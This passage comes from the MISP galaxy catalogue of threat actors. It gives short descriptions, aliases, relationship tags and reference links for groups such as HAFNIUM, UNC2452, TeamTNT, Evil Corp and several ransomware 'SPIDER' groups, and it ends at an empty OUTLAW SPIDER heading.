Operation Shadow Force

Operation Shadow Force is the name given to a cluster of activity, observed from 2013 to 2020 and characterised by the Shadow Force and Wgdrop malware families, that attacks Korean companies and organizations. The group’s first confirmed attack was in March 2013, but judging by the malware compilation dates it was probably active before 2012. It was named Operation Shadow Force because Shadow Force is the malware the attackers mainly use; it has not been confirmed whether the attacker is associated with a known group.

The tag is: misp-galaxy:threat-actor="Operation Shadow Force"

Table 12038. Table References

Links

https://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?curPage=1&menu_dist=2&seq=29129

https://mobile.twitter.com/mstoned7/status/1247361687570673664

NOTROBIN

Researchers at FireEye report finding a hacking group (dubbed NOTROBIN) that bundles mitigation code for the Citrix NetScaler vulnerability with its exploit. In effect, the attackers exploit the flaw to get access to the server, kill any existing malware, set up their own backdoor, and then apply a mitigation that blocks the vulnerable code path against later exploitation attempts by others, while their own backdoor keeps them in.

The tag is: misp-galaxy:threat-actor="NOTROBIN"

Table 12039. Table References

Links

https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/

https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html

ItaDuke

ItaDuke is an actor known since 2013. It used PDF exploits to drop malware and Twitter accounts to store C2 server URLs. In 2019, an actor named DarkUniverse, active between 2009 and 2017, was attributed to ItaDuke by Kaspersky.

The tag is: misp-galaxy:threat-actor="ItaDuke"

ItaDuke is also known as:

  • DarkUniverse

  • SIG27

Table 12040. Table References

Links

https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/

https://www.fireeye.com/blog/threat-research/2013/02/the-number-of-the-beast.html

https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465

Nazar

This actor was identified by Juan Andres Guerrero-Saade from the SIG37 cluster as published in the ShadowBrokers' 'Lost in Translation' leak. The earliest known sighting potentially dates back as far as 2008, with a confirmed center of activity around 2010-2013. The actor name is derived from a PDB debug string fragment: 'khzer'. Victimology indicates targeting of Iran, assessed with low confidence based on VT file submission locations. Nazar employs a modular toolkit where a main dropper silently registers multiple DLLs as OLE controls in the Windows registry. Functionality includes keylogging, sound and screen grabbing, as well as traffic capture using the MicroOlap Packet Sniffer library.

The tag is: misp-galaxy:threat-actor="Nazar"

Nazar is also known as:

  • SIG37

Table 12041. Table References

Links

https://www.epicturla.com/blog/the-lost-nazar

Higaisa

This group times its phishing activity around significant North Korean dates, such as holidays and national events. Lures include New Year greetings, Lantern Festival greetings, North Korean celebrations, important news, and contact lists of overseas personnel. The group also has mobile attack capabilities. Its targets include diplomatic entities related to North Korea (such as embassy officials in various locations), government officials, human rights organizations, North Korean residents abroad, and traders. Victim countries observed so far include China, North Korea, Japan, Nepal, Singapore, Russia, Poland and Switzerland.

The tag is: misp-galaxy:threat-actor="Higaisa"

Table 12042. Table References

Links

https://s.tencent.com/research/report/836.html

https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/

COBALT JUNO

COBALT JUNO has operated since at least 2013 and focused on targets located in the Middle East including Iran, Jordan, Egypt and Lebanon. COBALT JUNO's custom spyware families SABER1 and SABER2 include surveillance functionality and masquerade as legitimate software utilities such as Adobe Updater, StickyNote and ASKDownloader. CTU researchers assess with moderate confidence that COBALT JUNO operated the ZooPark Android spyware since at least mid-2015. ZooPark was publicly exposed in 2018 in both vendor reporting and a high-profile leak of C2 server data. COBALT JUNO is linked to a private security company in Iran and outsources aspects of tool development work to commercial software developers. CTU researchers have observed the group using strategic web compromises to deliver malware. CTU researchers’ discovery of new C2 domains in 2019 suggests the group is still actively performing operations.

The tag is: misp-galaxy:threat-actor="COBALT JUNO"

COBALT JUNO is also known as:

  • APT-C-38 (QiAnXin)

  • SABER LION

  • TG-2884 (SCWX CTU)

Table 12043. Table References

Links

https://www.secureworks.com/research/threat-profiles/cobalt-juno

COBALT KATANA

COBALT KATANA has been active since at least March 2018, and it focuses many of its operations on organizations based in or associated with Kuwait. The group has targeted government, logistics, and shipping organizations. The threat actors gain initial access to targets using DNS hijacking, strategic web compromise with SMB forced authentication, and password brute force attacks. COBALT KATANA operates a custom platform referred to as the Sakabota Framework, also referred to as Sakabota Core, with a complementary set of modular backdoors and accessory tools including Gon, Hisoka, Hisoka Netero, Killua, Diezen, and Eye. The group has implemented DNS tunnelling in its malware and malicious scripts and also operates the HyphenShell web shell to strengthen post-intrusion access. CTU researchers assess with moderate confidence that COBALT KATANA operates on behalf of Iran, and elements of its operations such as overlapping infrastructure, use of DNS hijacking, implementation of DNS-based C2 channels in malware and web shell security mechanisms suggest connections to COBALT GYPSY and COBALT EDGEWATER.

The tag is: misp-galaxy:threat-actor="COBALT KATANA"

COBALT KATANA is also known as:

  • Hive0081 (IBM)

  • SectorD01 (NHSC)

  • xHunt campaign (Palo Alto)

  • Hunter Serpens

Table 12044. Table References

Links

https://www.secureworks.com/research/threat-profiles/cobalt-katana

https://unit42.paloaltonetworks.com/atoms/hunter-serpens/

Dark Basin

Dark Basin is a hack-for-hire group that has targeted thousands of individuals and hundreds of institutions on six continents. Targets include advocacy groups and journalists, elected and senior government officials, hedge funds, and multiple industries. Dark Basin extensively targeted American nonprofits, including organisations working on a campaign called #ExxonKnew, which asserted that ExxonMobil hid information about climate change for decades. We also identify Dark Basin as the group behind the phishing of organizations working on net neutrality advocacy, previously reported by the Electronic Frontier Foundation. We link Dark Basin with high confidence to an Indian company, BellTroX InfoTech Services, and related entitie

The tag is: misp-galaxy:threat-actor="Dark Basin"

Table 12045. Table References

Links

https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/

https://github.com/citizenlab/malware-indicators/tree/master/202006_DarkBasin

GALLIUM

GALLIUM is a threat actor believed to be targeting telecommunication providers around the world, mostly in South-East Asia, Europe and Africa. To compromise targeted networks, GALLIUM targets unpatched internet-facing services using publicly available exploits and has been known to target vulnerabilities in WildFly/JBoss.

The tag is: misp-galaxy:threat-actor="GALLIUM"

GALLIUM is also known as:

  • Red Dev 4

  • Alloy Taurus

  • Granite Typhoon

GALLIUM has relationships with:

  • similar: misp-galaxy:threat-actor="Operation Soft Cell" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="GALLIUM" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="Granite Typhoon" with estimative-language:likelihood-probability="likely"

Table 12046. Table References

Links

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

https://www.youtube.com/watch?v=fBFm2fiEPTg

https://troopers.de/troopers22/talks/7cv8pz/

https://unit42.paloaltonetworks.com/atoms/alloytaurus/

https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/

Evilnum

ESET has analyzed the operations of Evilnum, the APT group behind the Evilnum malware previously seen in attacks against financial technology companies. While said malware has been seen in the wild since at least 2018 and documented previously, little has been published about the group behind it and how it operates. The group’s targets remain fintech companies, but its toolset and infrastructure have evolved and now consist of a mix of custom, homemade malware combined with tools purchased from Golden Chickens, a Malware-as-a-Service (MaaS) provider whose infamous customers include FIN6 and Cobalt Group.

The tag is: misp-galaxy:threat-actor="Evilnum"

Evilnum is also known as:

  • DeathStalker

  • TA4563

  • EvilNum

  • Jointworm

  • KNOCKOUT SPIDER

Table 12047. Table References

Links

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

https://securelist.com/deathstalker-mercenary-triumvirate/98177/

https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/

https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-active-iocs-7

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-targeting-financial-sector

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.hivepro.com/wp-content/uploads/2022/08/Vulnerabilities-Threats-that-Matter-25th-to-31st-July.pdf

https://medium.com/bitso-engineering/profiling-disrupting-an-apt-spear-phishing-campaign-targeting-slack-users-in-the-financial-sector-9389533d5fc2

Fox Kitten

PIONEER KITTEN is an Iran-based adversary that has been active since at least 2017 and has a suspected nexus to the Iranian government. This adversary appears to be primarily focused on gaining and maintaining access to entities possessing sensitive information of likely intelligence interest to the Iranian government. According to DRAGOS, they also targeted ICS-related entities using known VPN vulnerabilities. They are widely known to use open source penetration testing tools for reconnaissance and to establish encrypted communications.

The tag is: misp-galaxy:threat-actor="Fox Kitten"

Fox Kitten is also known as:

  • PIONEER KITTEN

  • PARISITE

  • UNC757

  • Lemon Sandstorm

  • RUBIDIUM

Fox Kitten has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Lemon Sandstorm" with estimative-language:likelihood-probability="likely"

Table 12048. Table References

Links

https://youtu.be/pBDu8EGWRC4?t=2492

https://www.dragos.com/threat/parisite

https://www.dragos.com/wp-content/uploads/The-ICS-Threat-Landscape.pdf

https://www.dragos.com/wp-content/uploads/NA-EL-Threat-Perspective-2019.pdf

https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf

https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices

https://www.crowdstrike.com/blog/who-is-pioneer-kitten

https://www.zdnet.com/article/iranian-hackers-are-selling-access-to-compromised-companies-on-an-underground-forum

https://us-cert.cisa.gov/ncas/alerts/aa20-259a

XDSpy

Rare is the APT group that goes largely undetected for nine years, but XDSpy is just that; a previously undocumented espionage group that has been active since 2011. It has attracted very little public attention, with the exception of an advisory from the Belarusian CERT in February 2020. In the interim, the group has compromised many government agencies and private companies in Eastern Europe and the Balkans.

The tag is: misp-galaxy:threat-actor="XDSpy"

Table 12049. Table References

Links

https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/

https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf

https://github.com/eset/malware-ioc/tree/master/xdspy/

Evil Corp

Evil Corp is an international cybercrime network. In December of 2019 the US Federal Government offered a $5M bounty for information leading to the arrest and conviction of Maksim V. Yakubets for allegedly orchestrating Evil Corp operations. The group is responsible for stealing over $100M from businesses and consumers. The Evil Corp organization is known for utilizing custom strains of malware such as JabberZeus, Bugat and Dridex to steal banking credentials.

The tag is: misp-galaxy:threat-actor="Evil Corp"

Evil Corp is also known as:

  • GOLD DRAKE

Table 12050. Table References

Links

https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/

https://en.wikipedia.org/wiki/Maksim_Yakubets

https://www.bbc.com/news/world-us-canada-53195749

http://www.secureworks.com/research/threat-profiles/gold-drake

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

TRACER KITTEN

In April 2020, CrowdStrike Falcon OverWatch discovered the Iran-based adversary TRACER KITTEN conducting malicious interactive activity against multiple hosts at a telecommunications company in the Europe, Middle East and Africa (EMEA) region. The actor was found operating under valid user accounts, using custom backdoors in combination with SSH tunnels for C2. The adversary leveraged their foothold to conduct a variety of reconnaissance activities, undertake credential harvesting and prepare for data exfiltration.

The tag is: misp-galaxy:threat-actor="TRACER KITTEN"

Table 12051. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf

FIN11

FIN11 is a well-established financial crime group that has recently focused its operations on ransomware and extortion. The group has been active since 2017 and has been tracked under UNC902 and later on as TEMP.Warlock. In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. (FireEye) Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in a few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—are part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion. Notably, FIN11 includes a subset of the activity security researchers call TA505, Graceful Spider, Gold Evergreen, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

The tag is: misp-galaxy:threat-actor="FIN11"

FIN11 is also known as:

  • TEMP.Warlock

  • UNC902

FIN11 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Lace Tempest" with estimative-language:likelihood-probability="likely"

Table 12052. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html

https://www.fireeye.com/blog/threat-research/2020/10/fin11-email-campaigns-precursor-for-ransomware-data-theft.html

https://www.brighttalk.com/webcast/7451/447347

UNC1878

UNC1878 is a financially motivated threat actor that monetizes network access via the deployment of RYUK ransomware. Earlier this year, Mandiant published a blog on a fast-moving adversary deploying RYUK ransomware, UNC1878. Shortly after its release, there was a significant decrease in observed UNC1878 intrusions and RYUK activity overall almost completely vanishing over the summer. But beginning in early fall, Mandiant has seen a resurgence of RYUK along with TTP overlaps indicating that UNC1878 has returned from the grave and resumed their operations.

The tag is: misp-galaxy:threat-actor="UNC1878"

Table 12053. Table References

Links

https://twitter.com/anthomsec/status/1321865315513520128

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456

https://www.youtube.com/watch?v=CgDtm05qApE

https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html

Red Charon

Throughout 2019, multiple companies in the Taiwan high-tech ecosystem were victims of an advanced persistent threat (APT) attack. Because these APT attacks had similar behavior profiles (similar adversarial tactics, techniques, and procedures, or TTPs) to each other and to previously documented cyberattacks, CyCraft assesses with high confidence that these new attacks were conducted by the same foreign threat actor. During their investigation, they dubbed this threat actor Chimera. “Chimera” stands for the synthesis of hacker tools that they’ve seen the group use, such as the skeleton key malware that contained code extracted from both Dumpert and Mimikatz — hence Chimera. Their operation — the entirety of the new attacks utilizing the Skeleton Key attack (described below) from late 2018 to late 2019 — CyCraft has dubbed Operation Skeleton Key.

The tag is: misp-galaxy:threat-actor="Red Charon"

Table 12054. Table References

Links

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf

https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf

https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

UNC2452

Reporting regarding activity related to the SolarWinds supply chain injection has grown quickly since initial disclosure on 13 December 2020. A significant amount of press reporting has focused on the identification of the actor(s) involved, victim organizations, possible campaign timeline, and potential impact. The US Government and cyber community have also provided detailed information on how the campaign was likely conducted and some of the malware used. MITRE’s ATT&CK team — with the assistance of contributors — has been mapping techniques used by the actor group, referred to as UNC2452/Dark Halo by FireEye and Volexity respectively, as well as SUNBURST and TEARDROP malware.

The tag is: misp-galaxy:threat-actor="UNC2452"

UNC2452 is also known as:

  • DarkHalo

  • StellarParticle

  • NOBELIUM

  • Solar Phoenix

  • Midnight Blizzard

UNC2452 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="SNOWYAMBER" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="HALFRIG" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="QUARTERRIG" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Midnight Blizzard" with estimative-language:likelihood-probability="likely"

Table 12055. Table References

Links

https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://pastebin.com/6EDgCKxd

https://github.com/fireeye/sunburst_countermeasures

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware

https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html

https://unit42.paloaltonetworks.com/atoms/solarphoenix/

https://www.microsoft.com/en-us/security/blog/2024/01/25/midnight-blizzard-guidance-for-responders-on-nation-state-attack/

https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/

TeamTNT

In early February 2021, TeamTNT launched a new campaign against Docker and Kubernetes environments. Using a collection of container images that are hosted in Docker Hub, the attackers are targeting misconfigured Docker daemons, Kubeflow dashboards, and Weave Scope, exploiting these environments in order to steal cloud credentials, open backdoors, mine cryptocurrency, and launch a worm that is looking for the next victim. They’re linked to the First Crypto-Mining Worm to Steal AWS Credentials and the Hildegard cryptojacking malware. TeamTNT is a relatively recent addition to a growing number of threats targeting the cloud. While they employ some of the same tactics as similar groups, TeamTNT stands out with their social media presence and penchant for self-promotion. Tweets from TeamTNT’s account are in both English and German, although it is unknown if they are located in Germany.

The tag is: misp-galaxy:threat-actor="TeamTNT"

TeamTNT is also known as:

  • Adept Libra

Table 12056. Table References

Links

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt

https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment

https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool

https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html

https://cyware.com/news/hildegard-teamtnts-new-feature-rich-malware-targeting-kubernetes-6587eb45

https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/

https://unit42.paloaltonetworks.com/atoms/adept-libra/

HAFNIUM

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures. HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA. In campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments. HAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.

The tag is: misp-galaxy:threat-actor="HAFNIUM"

HAFNIUM is also known as:

  • ATK233

  • G0125

  • Operation Exchange Marauder

  • Red Dev 13

  • Silk Typhoon

HAFNIUM has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="HAFNIUM" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="Silk Typhoon" with estimative-language:likelihood-probability="likely"

Table 12057. Table References

Links

https://attack.mitre.org/groups/G0125/

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

https://www.splunk.com/en_us/blog/security/detecting-hafnium-exchange-server-zero-day-activity-in-splunk.html

https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers

https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day

https://twitter.com/ESETresearch/status/1366862946488451088

https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html

https://us-cert.cisa.gov/ncas/alerts/aa21-062a

https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289

https://github.com/microsoft/CSS-Exchange/tree/main/Security

https://github.com/cert-lv/exchange_webshell_detection

https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits

https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021

https://pastebin.com/J4L3r2RS

https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Execution/exchange-iis-worker-dropping-webshell.md

https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server

https://www.nextron-systems.com/2021/03/06/scan-for-hafnium-exploitation-evidence-with-thor-lite

https://www.thedailybeast.com/how-chinas-devastating-microsoft-hack-puts-us-all-at-risk

https://www.rnz.co.nz/news/political/447239/government-points-finger-at-china-over-cyber-attacks

https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking

https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

RedEcho

RedEcho: the group made heavy use of AXIOMATICASYMPTOTE — a term we use to track infrastructure that comprises ShadowPad C2s, which is shared between several Chinese threat activity groups.

The tag is: misp-galaxy:threat-actor="RedEcho"

Table 12058. Table References

Links

https://www.recordedfuture.com/redecho-targeting-indian-power-sector/

https://therecord.media/redecho-group-parks-domains-after-public-exposure/

Ghostwriter

Ghostwriter is referred to as an 'activity set', with various incidents tied together by overlapping behavioral characteristics and personas, rather than as an actor or group in itself.

The tag is: misp-galaxy:threat-actor="Ghostwriter"

Ghostwriter is also known as:

  • UNC1151

  • TA445

  • PUSHCHA

  • Storm-0257

  • DEV-0257

Ghostwriter has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Storm-0257" with estimative-language:likelihood-probability="likely"

Table 12059. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/07/ghostwriter-influence-campaign.html

https://twitter.com/hatr/status/1377220336597483520

https://www.mandiant.com/resources/unc1151-linked-to-belarus-government

https://www.bleepingcomputer.com/news/security/meta-ukrainian-officials-military-targeted-by-ghostwriter-hackers

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/

TRAVELING SPIDER

CrowdStrike tracks the criminal developer of Nemty ransomware as TRAVELING SPIDER. The actor has been observed to take advantage of single-factor authentication to gain access to victim organizations through Citrix Gateway and send extortion-related emails using the victim’s own Microsoft Office 365 instance.

The tag is: misp-galaxy:threat-actor="TRAVELING SPIDER"

Table 12061. Table References

Links

https://www.cyberscoop.com/coronavirus-hacking-disinformation-ransomware-spearphishing/

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeServicesCyberFrontLines.pdf

MALLARD SPIDER

CrowdStrike tracks the operators behind Qbot as MALLARD SPIDER.

The tag is: misp-galaxy:threat-actor="MALLARD SPIDER"

MALLARD SPIDER is also known as:

  • GOLD LAGOON

Table 12062. Table References

Links

https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/

http://www.secureworks.com/research/threat-profiles/gold-lagoon

RIDDLE SPIDER

According to CrowdStrike, RIDDLE SPIDER is the operator behind the Avaddon ransomware.

The tag is: misp-galaxy:threat-actor="RIDDLE SPIDER"

Table 12063. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

GOLD DUPONT

GOLD DUPONT is a financially motivated cybercriminal threat group that specializes in post-intrusion ransomware attacks using 777 (aka Defray777 or RansomExx) malware. Active since November 2018, GOLD DUPONT establishes initial access into victim networks using stolen credentials to remote access services like virtual desktop infrastructure (VDI) or virtual private networks (VPN). From October 2019 to early 2020 the group used GOLD BLACKBURN’s TrickBot malware as an initial access vector (IAV) during some intrusions. Since July 2020, the group has also used GOLD SWATHMORE’s IcedID (Bokbot) malware as an IAV in some intrusions.

The tag is: misp-galaxy:threat-actor="GOLD DUPONT"

GOLD DUPONT is also known as:

  • SPRITE SPIDER

Table 12064. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-dupont

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://www.youtube.com/watch?v=qxPXxWMI2i4

SOLAR SPIDER

SOLAR SPIDER’s phishing campaigns deliver the JSOutProx RAT to financial institutions across Africa, the Middle East, South Asia and Southeast Asia.

The tag is: misp-galaxy:threat-actor="SOLAR SPIDER"

Table 12065. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

VIKING SPIDER

VIKING SPIDER is the criminal group behind the development and distribution of Ragnar Locker ransomware. While public reporting indicates the group began threatening to leak victim data in February 2020, a DLS was not observed until April 2020. The DLS is hosted on Tor, and similar to other actors, proof of data exfiltration is provided before the stolen data is fully leaked. It was also noted that on Dec. 22, 2020, a new post made to MountLocker ransomware’s Tor-hosted DLS was titled 'Cartel News' and included details of a victim of VIKING SPIDER’s Ragnar Locker.

The tag is: misp-galaxy:threat-actor="VIKING SPIDER"

Table 12066. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

CIRCUS SPIDER

According to CrowdStrike, the NetWalker ransomware is being developed and maintained by a Russian-speaking actor designated as CIRCUS SPIDER. Initially discovered in September 2019 and having a compilation timestamp dating back to 28 August 2019, NetWalker has been found to be used in Big Game Hunting (BGH)-style operations while also being distributed via spam. CIRCUS SPIDER is advertising NetWalker as being a closed-affiliate program, and verifies applicants before they are accepted as an affiliate. The requirements range from providing proof of previous revenue in similar affiliate programs, experience in the field and what type of industry the applicant is targeting.

The tag is: misp-galaxy:threat-actor="CIRCUS SPIDER"

Table 12067. Table References

Links

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/

https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf

GOLD EVERGREEN

GOLD EVERGREEN was a financially motivated cybercriminal threat group that operated the Gameover Zeus (aka Mapp, P2P Zeus) botnet until June 2014. It encompasses an expansive and long running criminal conspiracy operated by a confederation of individuals calling themselves The Business Club from the mid 2000s until 2014. GOLD EVERGREEN’s technical operation was facilitated primarily through botnets using the Zeus, JabberZeus, and eventually Gameover Zeus malware families. These malware families were designed and maintained by a Russian national Evgeniy Bogachev (aka 'slavik') who was indicted by the U.S. DOJ in 2014 and remains a fugitive.

The tag is: misp-galaxy:threat-actor="GOLD EVERGREEN"

Table 12068. Table References

Links

http://www.secureworks.com/research/threat-profiles/gold-evergreen

https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group

BAMBOO SPIDER

CrowdStrike tracks the developer of Panda Zeus as BAMBOO SPIDER.

The tag is: misp-galaxy:threat-actor="BAMBOO SPIDER"

Table 12069. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf

https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/

BOSON SPIDER

BOSON SPIDER is a cybercriminal group that was first identified in 2015 and inexplicably went dark in the spring of 2016; it appears to be a tightly knit group operating out of Eastern Europe. They have used a variety of distribution mechanisms, such as the infamous (and now defunct) Angler exploit kit, and obfuscated JavaScript to reduce detection by antivirus solutions.

The tag is: misp-galaxy:threat-actor="BOSON SPIDER"

Table 12070. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf

https://www.crowdstrike.com/blog/ecrime-ecosystem/

OVERLORD SPIDER

OVERLORD SPIDER, aka The Dark Overlord. Similar to ransomware operators today, OVERLORD SPIDER likely purchased RDP access to compromised servers on underground forums in order to exfiltrate data from corporate networks. The actor was known to attempt to “sell back” the data to the respective victims, threatening to sell the data to interested parties should the victim refuse to pay. There was at least one identified instance of OVERLORD SPIDER successfully selling victim data on an underground market.

The tag is: misp-galaxy:threat-actor="OVERLORD SPIDER"

Table 12071. Table References

Links

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

OUTLAW SPIDER

